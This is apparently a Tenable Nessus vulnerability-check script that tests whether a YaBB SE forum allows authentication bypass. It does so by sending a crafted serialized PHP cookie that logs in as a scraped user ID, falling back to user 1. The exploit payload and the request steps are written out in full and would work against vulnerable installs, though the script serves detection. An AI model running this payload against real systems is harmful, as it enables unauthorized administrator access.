#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(30054);
  script_version("$Revision: 1.1 $");

  script_bugtraq_id(27414);

  script_name(english:"YaBB SE Cookie Authentication Bypass Vulnerability");
  script_summary(english:"Tries to bypass authentication using a specially-crafted cookie");

  desc = "
Synopsis :

The remote web server contains a PHP application that suffers from an
authentication bypass vulnerability. 

Description :

The remote host is running YaBB SE, a web-based forum written in PHP. 

The version of YaBB SE installed on the remote host allows use of a
cookie to bypass authentication.  A remote attacker can leverage this
issue using a specially-crafted value for the cookie to gain access as
any user, including the administrator, which could in turn lead to
execution of arbitrary commands on the affected host, subject to the
privileges under which the web server operates. 

See also :

http://www.milw0rm.com/exploits/4963

Solution :

Use another product since YaBB SE is no longer supported. 

Risk factor :

High / CVSS Base Score : 7.5
(CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}


include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("url_func.inc");


port = get_http_port(default:80);
if (!get_port_state(port)) exit(0);
if (!can_host_php(port:port)) exit(0);


# Loop through directories.
if (thorough_tests) dirs = make_list("/yabbse", "/forum", cgi_dirs());
else dirs = make_list(cgi_dirs());

foreach dir (dirs)
{
  # Grab index.php.
  url = string(dir, "/index.php");
  res = http_get_cache(item:url, port:port);
  if (res == NULL) exit(0);

  # Identify a userid; fall back to "1" if not found.
  userid = NULL;
  username = NULL;

  pat = 'href="[^"]+\\?action=viewprofile;user=([^"]+)">';
  matches = egrep(pattern:pat, string:res);
  if (matches) 
  {
    foreach match (split(matches)) 
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        username = item[1];
        break;
      }
    }
  }
  if (username)
  {
    req = http_get(
      item:string(url, "?action=viewprofile;user=", username),
      port:port
    );
    res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
    if (res == NULL) exit(0);

    pat = 'action="[^"]+\\?board=;action=usersrecentposts;userid=([0-9]+);user=';
    matches = egrep(pattern:pat, string:res);
    if (matches) 
    {
      foreach match (split(matches)) 
      {
        match = chomp(match);
        item = eregmatch(pattern:pat, string:match);
        if (!isnull(item))
        {
          userid = item[1];
          break;
        }
      }
    }
  }
  if (isnull(userid)) userid = "1";

  # Now find the cookie name; fall back to "YaBBSE155" if not found.
  req = http_get(
    item:string(url, "?action=logout&sesc=1"),
    port:port
  );
  req = str_replace(
    string:req,
    find:"User-Agent:",
    replace:string(
      "Cookie: PHPSESSID=1\r\n",
      "User-Agent:"
    )
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
  if (res == NULL) exit(0);

  cookie = NULL;

  pat = "^Set-Cookie: +([^=]+)=deleted";
  matches = egrep(pattern:pat, string:res);
  if (matches) 
  {
    foreach match (split(matches)) 
    {
      match = chomp(match);
      item = eregmatch(pattern:pat, string:match);
      if (!isnull(item))
      {
        cookie = item[1];
        break;
      }
    }
  }
  if (isnull(cookie)) cookie = "YaBBSE155";

  # Finally, try to exploit the issue to log in.
  exploit = string('a:2:{i:0;s:', strlen(userid), ':"', userid, '";i:1;b:1;}');

  req = http_get(item:url, port:port);
  req = str_replace(
    string:req,
    find:"User-Agent:",
    replace:string(
      "Cookie: ", cookie, "=", urlencode(str:exploit), "\r\n",
      "User-Agent:"
    )
  );
  res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
  if (res == NULL) exit(0);

  # There's a problem if we got in.
  if (";action=profile;" >< res)
  {
    security_hole(port);
    exit(0);
  }
}
